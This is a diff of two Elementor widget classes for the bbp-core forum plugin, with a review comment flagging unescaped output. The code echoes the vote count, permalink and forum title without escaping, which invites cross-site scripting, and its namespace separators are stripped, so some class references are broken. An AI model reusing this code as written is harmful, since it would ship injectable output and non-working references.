-	public function get_icon() {
-		return 'bbpc_icon_ama_ajax_forum';
-	}
-
-	public function get_keywords() {
-		return [ 'forum', 'ajax' ];
-	}
-
-	public function get_categories() {
-		return [ 'bbp-core' ];
-	}
-
-	public function get_style_depends() {
-		return [ 'bbpc-el-widgets' ];
-	}
-
-	public function get_script_depends() {
-		return [ 'bbpc-ajax' ];
-	}
-
-	protected function register_controls() {
-		/**
-		 * Content section
-		 */
-		$this->start_controls_section(
-			'content_sec', [
-				'label' => esc_html__( 'Content Section', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'ppp2', [
-				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
-				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::NUMBER,
-				'label_block' => true,
-				'default'     => 9
-			]
-		);
-
-		$this->add_control(
-			'order', [
-				'label'   => esc_html__( 'Order', 'bbp-core' ),
-				'type'    => ElementorControls_Manager::SELECT,
-				'options' => [
-					'ASC'  => 'ASC',
-					'DESC' => 'DESC'
-				],
-				'default' => 'ASC'
-			]
-		);
-
-		// button show hide switcher
-		$this->add_control(
-			'filter_btns',
-			[
-				'label'        => esc_html__( 'Tab Filter', 'bbp-core' ),
-				'type'         => ElementorControls_Manager::SWITCHER,
-				'label_on'     => esc_html__( 'Show', 'bbp-core' ),
-				'label_off'    => esc_html__( 'Hide', 'bbp-core' ),
-				'return_value' => 'yes',
-				'default'      => 'yes',
-			]
-		);
-
-		$this->end_controls_section();
-
-		/**
-		 * Styling section starts
-		 */
-		$this->start_controls_section(
-			'styling_sec', [
-				'label' => esc_html__( 'Title Style', 'bbp-core' ),
-				'tab'   => Controls_Manager::TAB_STYLE,
-			]
-		);
-		//forum title
-		$this->add_control(
-			'forum_heading',
-			[
-				'label' => esc_html__( 'Forum Title', 'bbp-core' ),
-				'type' => ElementorControls_Manager::HEADING,
-				'separator' => 'before',
-			]
-		);
-
-
-		$this->add_control(
-			'forum_title_color',
-			[
-				'label'     => esc_html__( 'Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .single-forum-post-widget .post-title a' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->add_control(
-			'forum_title_hover_color',
-			[
-				'label'     => esc_html__( 'Hover Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .single-forum-post-widget .post-title a:hover' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->add_group_control(
-			ElementorGroup_Control_Typography::get_type(),
-			[
-				'name'     => 'forum_title_typography',
-				'selector' => '{{WRAPPER}} .single-forum-post-widget .post-title a',
-			]
-		);
-
-		// Forum meta
-		$this->add_control(
-			'forum_meta',
-			[
-				'label' => esc_html__( 'Forum Meta', 'bbp-core' ),
-				'type' => ElementorControls_Manager::HEADING,
-				'separator' => 'before',
-			]
-		);
-
-		$this->add_control(
-			'forum_meta_color',
-			[
-				'label'     => esc_html__( 'Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .single-forum-post-widget .post-info .author,{{WRAPPER}} .single-forum-post-widget .post-info .post-time' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-
-		$this->add_group_control(
-			ElementorGroup_Control_Typography::get_type(),
-			[
-				'name'     => 'forum_meta_typography',
-				'selector' => '{{WRAPPER}} .single-forum-post-widget .post-info .author,{{WRAPPER}} .single-forum-post-widget .post-info .post-time',
-			]
-		);
-
-		//parent forum
-		$this->add_control(
-			'parent_forum',
-			[
-				'label' => esc_html__( 'Parent Forum', 'bbp-core' ),
-				'type' => ElementorControls_Manager::HEADING,
-				'separator' => 'before',
-			]
-		);
-
-		$this->add_control(
-			'parent_forum_color',
-			[
-				'label'     => esc_html__( 'Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .post-content .post-category a' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->add_control(
-			'parent_forum_color_hover',
-			[
-				'label'     => esc_html__( 'Hover color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .post-content .post-category a:hover' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->add_group_control(
-			ElementorGroup_Control_Typography::get_type(),
-			[
-				'name'     => 'parent_forum_typo',
-				'selector' => '{{WRAPPER}} .post-content .post-category a',
-			]
-		);
-
-		$this->end_controls_section();
-	}
-
-	protected function render() {
-		$settings 		= $this->get_settings();
-		$filter_btns 	= $settings['filter_btns'] ?? true;
-
-		$topics = new WP_Query( array(
-			'post_type'      => 'topic',
-			'posts_per_page' => ! empty( $settings['ppp2'] ) ? $settings['ppp2'] : 9,
-			'order'          => $settings['order'] ? $settings['order'] : 'DESC',
-		) );
-		?>
-
-        <div class="forum-post-widget" data_id="<?php echo esc_attr( $this->get_id() ); ?>">
-
-			<?php
-			if ( $filter_btns == true ) :
-				?>
-				<div class="post-filter-widget mb-20 wow fadeInUp">
-					<div class="single-filter-item">
-						<a href="#" id="all_filt" data-forum="all" class="data-active">
-							<i class="icon_grid-2x2"></i><?php _e( 'All', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="populer_filt" data-forum="popular">
-							<i class="icon_easel"></i><?php _e( 'Popular', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="featured_filt" data-forum="featured">
-							<i class="icon_ribbon_alt"></i><?php _e( 'Featured', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="recent_filt" data-forum="recent">
-							<i class="icon_clock_alt"></i><?php _e( 'Recent', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="unsolved_filt" data-forum="unsolved">
-							<i class="icon_close_alt2"></i><?php _e( 'Unsolved', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="solved_filt" data-forum="solved">
-							<i class="icon_check_alt2"></i><?php _e( 'Solved', 'bbp-core' ) ?>
-						</a>
-					</div>
-				</div>
-				<?php
-			endif;
-			?>
-
-            <div id="aj-post-filter-widget">
-				<?php
-				$delay = 0.0;
-				$i     = 0;
-				while ( $topics->have_posts() ) : $topics->the_post();
-					$item_id    = get_the_ID();
-					$author_id  = get_post_field( 'post_author', $item_id );
-					$topic_id   = $topics->posts[ $i ]->ID;
-					$vote_count = get_post_meta( $topic_id, "bbpv-votes", true );
-					$forum_id   = bbp_get_topic_forum_id();
-					?>
-                    <div class="single-forum-post-widget wow fadeInUp" data-wow-delay="<?php echo $delay ?>s">
-                        <div class="post-content">
-                            <div class="post-title">
-                                <h6><a href="<?php the_permalink(); ?>"> <?php the_title() ?> </a></h6>
-                            </div>
-                            <div class="post-info">
-                                <div class="author">
-                                    <img src="<?php echo BBPC_IMG ?>/forum_tab/user-circle-alt.svg" alt="<?php esc_attr_e( 'User circle alt icon', 'bbpc-core' ); ?>">
-									<?php
-									echo bbp_get_topic_author_link(
-										array(
-											'post_id' 	=> $topic_id,
-											'type' 		=> 'name'
-										)
-									);
-									?>
-                                </div>
-
-                                <div class="post-time">
-                                    <img src="<?php echo BBPC_IMG ?>/forum_tab/time-outline.svg" alt="<?php esc_attr_e( 'Time outline icon', 'bbpc-core' ); ?>">
-									<?php echo bbp_forum_last_active_time( get_the_ID() ); ?>
-                                </div>
-                            </div>
-
-                            <div class="post-category">
-                                <a href="<?php echo get_the_permalink( $forum_id ) ?>">
-									<?php echo get_the_post_thumbnail( $forum_id ); ?>
-									<?php echo bbp_get_topic_forum_title(); ?>
-                                </a>
-                            </div>
-                        </div>
-                        <div class="post-reach">
-                            <div class="post-view">
-                                <img src="<?php echo BBPC_IMG ?>/forum_tab/eye-outline.svg" alt="<?php esc_attr_e( 'Eye outline icon', 'bbpc-core' ); ?>">
-
-								<?php
-								bbp_topic_view_count( $topic_id );
-								echo ' ';
-								_e( 'Views', 'bbp-core' );
-								?>
-                            </div>
-                            <div class="post-like">
-                                <img src="<?php echo BBPC_IMG ?>/forum_tab/thumbs-up-outline.svg" alt="<?php esc_attr_e( 'Thumbs-up outline icon', 'bbpc-core' ); ?>">
-
-								<?php
-								if ( $vote_count ) {
-									echo $vote_count;
-								} else {
-									echo "0";
-								}
-
-								echo ' ';
-								_e( 'Likes', 'bbp-core' );
-								?>
-                            </div>
-                            <div class="post-comment">
-                                <img src="<?php echo BBPC_IMG ?>/forum_tab/chatbubbles-outline.svg" alt="<?php esc_attr_e( 'Chat bubbles icon', 'bbpc-core' ); ?>">
-
-								<?php
-								bbp_topic_reply_count( $topic_id );
-								echo ' ';
-								_e( 'Replies', 'bbp-core' );
-								?>
-                            </div>
-                        </div>
-                    </div>
-
-					<?php
-					$delay += 0.2;
-					if ( $delay > 0.6 ) {
-						$delay = 0.0;
-					}
-					$i ++;
-				endwhile;
-				unset( $delay );
-				unset( $i );
-				wp_reset_postdata();
-				?>
-            </div>
-        </div>
-		<?php
-	}
+<?php
+
+namespace adminElementor;
+
+use ElementorControls_Manager;
+use ElementorWidget_Base;
+use WP_Query;
+
+// Exit if accessed directly
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+class Forum_Ajax extends Widget_Base {
+	public function get_name(): string
+    {
+		return 'ama_ajax_forum';
+	}
+
+	public function get_title(): string
+    {
+		return esc_html__( 'BBPC Ajax Forums', 'bbp-core' );
+	}
+
+	public function get_icon(): string
+    {
+		return 'bbpc_icon_ama_ajax_forum';
+	}
+
+	public function get_keywords(): array
+    {
+		return [ 'forum', 'ajax' ];
+	}
+
+	public function get_categories(): array
+    {
+		return [ 'bbp-core' ];
+	}
+
+	public function get_style_depends(): array
+    {
+		return [ 'bbpc-el-widgets' ];
+	}
+
+	public function get_script_depends(): array
+    {
+		return [ 'bbpc-ajax' ];
+	}
+
+	protected function register_controls(): void
+    {
+		//========================== Filter Options =====================//
+		$this->start_controls_section(
+			'filter_sec', [
+				'label' => esc_html__( 'Filter Options', 'bbp-core' ),
+			]
+		);
+
+		$this->add_control(
+			'ppp2', [
+				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
+				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::NUMBER,
+				'default'     => 9
+			]
+		);
+
+		$this->add_control(
+			'order', [
+				'label'   => esc_html__( 'Order', 'bbp-core' ),
+				'type'    => ElementorControls_Manager::SELECT,
+				'options' => [
+					'ASC'  => 'ASC',
+					'DESC' => 'DESC'
+				],
+				'default' => 'ASC'
+			]
+		);
+
+		// button show hide switcher
+		$this->add_control(
+			'filter_btns',
+			[
+				'label'        => esc_html__( 'Tab Filter', 'bbp-core' ),
+				'type'         => ElementorControls_Manager::SWITCHER,
+				'label_on'     => esc_html__( 'Show', 'bbp-core' ),
+				'label_off'    => esc_html__( 'Hide', 'bbp-core' ),
+				'return_value' => 'yes',
+				'default'      => 'yes',
+			]
+		);
+
+		$this->end_controls_section();
+
+		/**
+		 * Styling section starts
+		 */
+		$this->start_controls_section(
+			'styling_sec', [
+				'label' => esc_html__( 'Title Style', 'bbp-core' ),
+				'tab'   => Controls_Manager::TAB_STYLE,
+			]
+		);
+		//forum title
+		$this->add_control(
+			'forum_heading',
+			[
+				'label' => esc_html__( 'Forum Title', 'bbp-core' ),
+				'type' => ElementorControls_Manager::HEADING,
+				'separator' => 'before',
+			]
+		);
+
+
+		$this->add_control(
+			'forum_title_color',
+			[
+				'label'     => esc_html__( 'Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .single-forum-post-widget .post-title a' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->add_control(
+			'forum_title_hover_color',
+			[
+				'label'     => esc_html__( 'Hover Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .single-forum-post-widget .post-title a:hover' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->add_group_control(
+			ElementorGroup_Control_Typography::get_type(),
+			[
+				'name'     => 'forum_title_typography',
+				'selector' => '{{WRAPPER}} .single-forum-post-widget .post-title a',
+			]
+		);
+
+		// Forum meta
+		$this->add_control(
+			'forum_meta',
+			[
+				'label' => esc_html__( 'Forum Meta', 'bbp-core' ),
+				'type' => ElementorControls_Manager::HEADING,
+				'separator' => 'before',
+			]
+		);
+
+		$this->add_control(
+			'forum_meta_color',
+			[
+				'label'     => esc_html__( 'Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .single-forum-post-widget .post-info .author,{{WRAPPER}} .single-forum-post-widget .post-info .post-time' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+
+		$this->add_group_control(
+			ElementorGroup_Control_Typography::get_type(),
+			[
+				'name'     => 'forum_meta_typography',
+				'selector' => '{{WRAPPER}} .single-forum-post-widget .post-info .author,{{WRAPPER}} .single-forum-post-widget .post-info .post-time',
+			]
+		);
+
+		//parent forum
+		$this->add_control(
+			'parent_forum',
+			[
+				'label' => esc_html__( 'Parent Forum', 'bbp-core' ),
+				'type' => ElementorControls_Manager::HEADING,
+				'separator' => 'before',
+			]
+		);
+
+		$this->add_control(
+			'parent_forum_color',
+			[
+				'label'     => esc_html__( 'Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .post-content .post-category a' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->add_control(
+			'parent_forum_color_hover',
+			[
+				'label'     => esc_html__( 'Hover color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .post-content .post-category a:hover' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->add_group_control(
+			ElementorGroup_Control_Typography::get_type(),
+			[
+				'name'     => 'parent_forum_typo',
+				'selector' => '{{WRAPPER}} .post-content .post-category a',
+			]
+		);
+
+		$this->end_controls_section();
+	}
+
+	protected function render() {
+		$settings 		= $this->get_settings();
+		$filter_btns 	= $settings['filter_btns'] ?? true;
+
+		$topics = new WP_Query( array(
+			'post_type'      => 'topic',
+			'posts_per_page' => ! empty( $settings['ppp2'] ) ? $settings['ppp2'] : 9,
+			'order'          => $settings['order'] ? $settings['order'] : 'DESC',
+		) );
+		?>
+
+        <div class="forum-post-widget" data_id="<?php echo esc_attr( $this->get_id() ); ?>">
+
+			<?php
+			if ($filter_btns) :
+				?>
+				<div class="post-filter-widget mb-20 wow fadeInUp">
+					<div class="single-filter-item">
+						<a href="#" id="all_filt" data-forum="all" class="data-active">
+							<i class="icon_grid-2x2"></i><?php esc_html_e( 'All', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="populer_filt" data-forum="popular">
+							<i class="icon_easel"></i><?php esc_html_e( 'Popular', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="featured_filt" data-forum="featured">
+							<i class="icon_ribbon_alt"></i><?php esc_html_e( 'Featured', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="recent_filt" data-forum="recent">
+							<i class="icon_clock_alt"></i><?php esc_html_e( 'Recent', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="unsolved_filt" data-forum="unsolved">
+							<i class="icon_close_alt2"></i><?php esc_html_e( 'Unsolved', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="solved_filt" data-forum="solved">
+							<i class="icon_check_alt2"></i><?php esc_html_e( 'Solved', 'bbp-core' ) ?>
+						</a>
+					</div>
+				</div>
+				<?php
+			endif;
+			?>
+
+            <div id="aj-post-filter-widget">
+				<?php
+				$delay = 0.0;
+				$i     = 0;
+				while ( $topics->have_posts() ) : $topics->the_post();
+					$topic_id   = $topics->posts[ $i ]->ID;
+					$vote_count = get_post_meta( $topic_id, "bbpv-votes", true );
+					$forum_id   = bbp_get_topic_forum_id();
+					?>
+                    <div class="single-forum-post-widget wow fadeInUp" data-wow-delay="<?php echo $delay ?>s">
+                        <div class="post-content">
+                            <div class="post-title">
+                                <h6><a href="<?php the_permalink(); ?>"> <?php the_title() ?> </a></h6>
+                            </div>
+                            <div class="post-info">
+                                <div class="author">
+                                    <img src="<?php echo BBPC_IMG . '/forum_tab/user-circle-alt.svg' ?>" alt="<?php esc_attr_e( 'User circle alt icon',
+                                        'bbpc-core' ); ?>">
+									<?php
+									echo bbp_get_topic_author_link(
+										array(
+											'post_id' 	=> $topic_id,
+											'type' 		=> 'name'
+										)
+									);
+									?>
+                                </div>
+
+                                <div class="post-time">
+                                    <img src="<?php echo BBPC_IMG . '/forum_tab/time-outline.svg' ?>" alt="<?php esc_attr_e( 'Time outline icon', 'bbpc-core' ); ?>">
+									<?php bbp_forum_last_active_time( get_the_ID() ); ?>
+                                </div>
+                            </div>
+
+                            <div class="post-category">
+                                <a href="<?php echo get_the_permalink( $forum_id ) ?>">
+									<?php echo get_the_post_thumbnail( $forum_id ); ?>
+									<?php echo bbp_get_topic_forum_title(); ?>
+                                </a>
+                            </div>
+                        </div>
+                        <div class="post-reach">
+                            <div class="post-view">
+                                <img src="<?php echo BBPC_IMG . '/forum_tab/eye-outline.svg' ?>" alt="<?php esc_attr_e( 'Eye outline icon', 'bbpc-core' ); ?>">
+
+								<?php
+								bbp_topic_view_count( $topic_id );
+								echo ' ';
+								esc_html_e( 'Views', 'bbp-core' );
+								?>
+                            </div>
+                            <div class="post-like">
+                                <img src="<?php echo BBPC_IMG . '/forum_tab/thumbs-up-outline.svg' ?>" alt="<?php esc_attr_e( 'Thumbs-up outline icon', 'bbpc-core' ); ?>">
+
+								<?php
+								if ( $vote_count ) {
+									echo $vote_count;
+								} else {
+									echo "0";
+								}
+
+								echo ' ';
+								esc_html_e( 'Likes', 'bbp-core' );
+								?>
+                            </div>
+                            <div class="post-comment">
+                                <img src="<?php echo BBPC_IMG . '/forum_tab/chatbubbles-outline.svg' ?>" alt="<?php esc_attr_e( 'Chat bubbles icon', 'bbpc-core' ); ?>">
+								<?php
+								bbp_topic_reply_count( $topic_id );
+								echo ' ';
+								esc_html_e( 'Replies', 'bbp-core' );
+								?>
+                            </div>
+                        </div>
+                    </div>
+					<?php
+					$delay += 0.2;
+					if ( $delay > 0.6 ) {
+						$delay = 0.0;
+					}
+					$i ++;
+				endwhile;
+				unset( $delay );
+				unset( $i );
+				wp_reset_postdata();
+				?>
+            </div>
+        </div>
+		<?php
+	}
 }
 No newline at end of file
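Review bot: `echo $vote_count;` in the `post-like` block still prints the `bbpv-votes` post meta unescaped, and `echo get_the_permalink( $forum_id )` and `echo bbp_get_topic_forum_title()` in `post-category` go out without `esc_url()` / `esc_html()`, even though this revision moved the labels from `_e()` to `esc_html_e()`; cast the count (`echo absint( $vote_count );`) and wrap the link and title. Two more points in the same hunk: `ElementorGroup_Control_Typography::get_type()` is used three times in `register_controls()` but the `use` block at the top of the new file only imports `Controls_Manager`, `Widget_Base` and `WP_Query`, and `Controls_Manager::TAB_STYLE` is the only bare reference while every other control uses the qualified form, so pick one. Finally `bbp_forum_last_active_time( get_the_ID() )` runs inside the topic loop with the topic's ID although it is the forum helper; bbPress's `bbp_topic_last_active_time( $topic_id )` is the topic counterpart.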
--- a/bbp-core/includes/Elementor/Forum_Tab.php
+++ b/bbp-core/includes/Elementor/Forum_Tab.php
@@ -1,245 +1,299 @@
-<?php
-namespace adminElementor;
-
-use ElementorControls_Manager;
-use ElementorWidget_Base;
-use WP_Query;
-
-// Exit if accessed directly
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-
-class Forum_Tab extends Widget_Base {
-	public function get_name() {
-		return 'ama_forum_tab';
-	}
-
-	public function get_title() {
-		return esc_html__( 'BBPC Forum Tabs', 'bbp-core' );
-	}
-
-	public function get_icon() {
-		return 'bbpc_icon_ama_forum_tab';
-	}
-
-	public function get_categories() {
-		return [ 'bbp-core' ];
-	}
-
-	public function get_style_depends() {
-		return['bbpc-el-widgets'];
-	}
-
-	// scripts dependencies
-	public function get_script_depends() {
-		return [ 'bbpc_js' ];
-	}
-
-
-	protected function register_controls() {
-		// --- Forum Filter Options
-		$this->start_controls_section(
-			'forum_filter', [
-				'label' => __( 'Forum Filter Options', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'forum_tab_title',
-			[
-				'label'       => __( 'Forum Tab Title', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::TEXT,
-				'default'     => __( 'Show Forums', 'bbp-core' ),
-				'placeholder' => __( 'Enter the tab title', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'ppp', [
-				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
-				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
-				'default'     => 9
-			]
-		);
-
-		$this->add_control(
-			'order', [
-				'label'   => esc_html__( 'Order', 'bbp-core' ),
-				'type'    => Controls_Manager::SELECT,
-				'options' => [
-					'ASC'  => 'ASC',
-					'DESC' => 'DESC'
-				],
-				'default' => 'ASC'
-			]
-		);
-
-		$this->add_control(
-			'more_txt', [
-				'label'       => esc_html__( 'More button text', 'bbp-core' ),
-				'type'        => Controls_Manager::TEXT,
-				'label_block' => true,
-				'separator'   => 'before',
-				'default'     => 'Show more'
-			]
-		);
-
-		$this->add_control(
-			'more_url',
-			[
-				'label'       => esc_html__( 'More button link', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::URL,
-				'placeholder' => __( 'https://your-link.com', 'bbp-core' ),
-				'default'     => [
-					'url'         => get_post_type_archive_link( 'forum' ),
-					'is_external' => true,
-					'nofollow'    => true,
-				],
-			]
-		);
-
-
-		$this->end_controls_section();
-
-		//-------- Topic Filter Options
-		$this->start_controls_section(
-			'topic_filter', [
-				'label' => __( 'Topic Filter Options', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'topics_tab_title',
-			[
-				'label'       => __( 'Topics Tab Title', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::TEXT,
-				'default'     => __( 'Show Topics', 'bbp-core' ),
-				'placeholder' => __( 'Enter the tab title', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'ppp2', [
-				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
-				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
-				'label_block' => true,
-				'default'     => 6
-			]
-		);
-
-		$this->add_control(
-			'order2', [
-				'label'   => esc_html__( 'Order', 'bbp-core' ),
-				'type'    => Controls_Manager::SELECT,
-				'options' => [
-					'ASC'  => 'ASC',
-					'DESC' => 'DESC'
-				],
-				'default' => 'ASC'
-			]
-		);
-
-		$this->add_control(
-			'more_txt2', [
-				'label'       => esc_html__( 'More button text', 'bbp-core' ),
-				'type'        => Controls_Manager::TEXT,
-				'label_block' => true,
-				'default'     => 'Show more'
-			]
-		);
-
-		$this->add_control(
-			'more_url2', [
-				'label'       => esc_html__( 'More button link', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::URL,
-				'placeholder' => __( 'https://your-link.com', 'bbp-core' ),
-				'default'     => [
-					'url'         => get_post_type_archive_link( 'topic' ),
-					'is_external' => true,
-					'nofollow'    => true,
-				],
-			]
-		);
-
-		$this->end_controls_section();
-
-		$this->start_controls_section(
-			'forum_tab_style', [
-				'label' => __( 'Forum Tab Title', 'bbp-core' ),
-				'tab'   => Controls_Manager::TAB_STYLE,
-			]
-		);
-
-		$this->add_group_control(
-			ElementorGroup_Control_Typography::get_type(),
-			[
-				'name'     => 'forum_tab_title',
-				'label'    => __( 'Tab Label Typography', 'bbp-core' ),
-				'selector' => '{{WRAPPER}} .community-area .nav-tabs .nav-item button',
-			]
-		);
-
-		$this->add_control(
-			'forum_tab_title_color',
-			[
-				'label'     => __( 'Tab Label Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .community-area .nav-tabs .nav-item button' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->end_controls_section();
-
-		$this->start_controls_section(
-			'forum_tab_button', [
-				'label' => esc_html__( 'Forum Tab Button', 'bbp-core' ),
-				'tab'   => Controls_Manager::TAB_STYLE,
-			]
-		);
-
-		$this->add_responsive_control(
-			'tab_btn_margin', [
-				'label'      => esc_html__( 'Margin', 'bbp-core' ),
-				'type'       => Controls_Manager::DIMENSIONS,
-				'size_units' => [ 'px', '%', 'em' ],
-				'selectors'  => [
-					'{{WRAPPER}} .tab-content .show-more-btn.show-more-round' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
-				],
-			]
-		);
-
-		$this->add_responsive_control(
-			'tab_btn_padding', [
-				'label'      => esc_html__( 'Tab button padding', 'bbp-core' ),
-				'type'       => Controls_Manager::DIMENSIONS,
-				'size_units' => [ 'px', '%', 'em' ],
-				'selectors'  => [
-					'{{WRAPPER}} .tab-content .show-more-btn.show-more-round' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
-				],
-			]
-		);
-
-		$this->end_controls_section();
-	}
-
-	protected function render() {
-		$settings = $this->get_settings();
-
-		$forums = new WP_Query( array(
-			'post_type'      => 'forum',
-			'posts_per_page' => ! empty( $settings['ppp'] ) ? $settings['ppp'] : 9,
-			'order'          => $settings['order'],
-		) );
-
-		$topics = new WP_Query( array(
-			'post_type'      => 'topic',
-			'posts_per_page' => ! empty( $settings['ppp2'] ) ? $settings['ppp2'] : 9,
-			'order'          => $settings['order'],
-		) );
-
-		include( "inc/forum/forum_tab.php" );
-	}
+<?php
+namespace adminElementor;
+
+use ElementorControls_Manager;
+use ElementorWidget_Base;
+use WP_Query;
+
+// Exit if accessed directly
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+class Forum_Tab extends Widget_Base {
+	public function get_name() {
+		return 'ama_forum_tab';
+	}
+
+	public function get_title() {
+		return esc_html__( 'BBPC Forum Tabs', 'bbp-core' );
+	}
+
+	public function get_icon() {
+		return 'bbpc_icon_ama_forum_tab';
+	}
+
+	public function get_categories() {
+		return [ 'bbp-core' ];
+	}
+
+	public function get_style_depends() {
+		return['bbpc-el-widgets'];
+	}
+
+	// scripts dependencies
+	public function get_script_depends() {
+		return [ 'bbpc_js' ];
+	}
+
+
+	protected function register_controls(): void
+    {
+
+
+		//======================= Forum Filter Options ==================
+		$this->start_controls_section(
+			'forum_filter', [
+				'label' => __( 'Forum Filter Options', 'bbp-core' ),
+			]
+		);
+
+		$this->add_control(
+			'forum_tab_title', [
+				'label'       => __( 'Forum Tab Title', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::TEXT,
+				'default'     => __( 'Show Forums', 'bbp-core' ),
+				'placeholder' => __( 'Enter the tab title', 'bbp-core' ),
+			]
+		);
+
+		$this->add_control(
+			'ppp', [
+				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
+				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
+				'default'     => 9
+			]
+		);
+
+		$this->add_control(
+			'order', [
+				'label'   => esc_html__( 'Order', 'bbp-core' ),
+				'type'    => Controls_Manager::SELECT,
+				'options' => [
+					'ASC'  => 'ASC',
+					'DESC' => 'DESC'
+				],
+				'default' => 'ASC'
+			]
+		);
+
+        //==== View More Button
+        $this->add_control(
+            'more_txt_heading', [
+                'label'       => esc_html__( 'View More Button', 'bbp-core' ),
+                'type'        => Controls_Manager::HEADING,
+                'separator'   => 'before',
+            ]
+        );
+
+        $this->add_control(
+            'is_forum_tab_btn', [
+                'label' => esc_html__( 'Button (Show/Hide)', 'bbp-core' ),
+                'type' => ElementorControls_Manager::SWITCHER,
+                'label_on' => esc_html__( 'Show', 'bbp-core' ),
+                'label_off' => esc_html__( 'Hide', 'bbp-core' ),
+                'return_value' => 'yes',
+                'default' => 'yes',
+            ]
+        );
+
+		$this->add_control(
+			'more_txt', [
+				'label'       => esc_html__( 'Button Label', 'bbp-core' ),
+				'type'        => Controls_Manager::TEXT,
+				'label_block' => true,
+				'default'     => esc_html__('View More', 'bbp-core'),
+                'condition'   => [
+                    'is_forum_tab_btn' => 'yes'
+                ]
+			]
+		);
+
+		$this->add_control(
+			'more_url', [
+				'label'       => esc_html__( 'Button URL', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::URL,
+				'default'     => [
+					'url'         => get_post_type_archive_link( 'forum' ),
+					'is_external' => true,
+					'nofollow'    => true,
+				],
+                'condition'   => [
+                    'is_forum_tab_btn' => 'yes'
+                ]
+			]
+		); //End View More Button
+
+		$this->end_controls_section(); // End Forum Filter Options
+
+
+		//======================== Topic Filter Options =========================//
+		$this->start_controls_section(
+			'topic_filter', [
+				'label' => __( 'Topic Filter Options', 'bbp-core' ),
+			]
+		);
+
+		$this->add_control(
+			'topics_tab_title', [
+				'label'       => __( 'Topics Tab Title', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::TEXT,
+				'default'     => __( 'Show Topics', 'bbp-core' ),
+				'placeholder' => __( 'Enter the tab title', 'bbp-core' ),
+			]
+		);
+
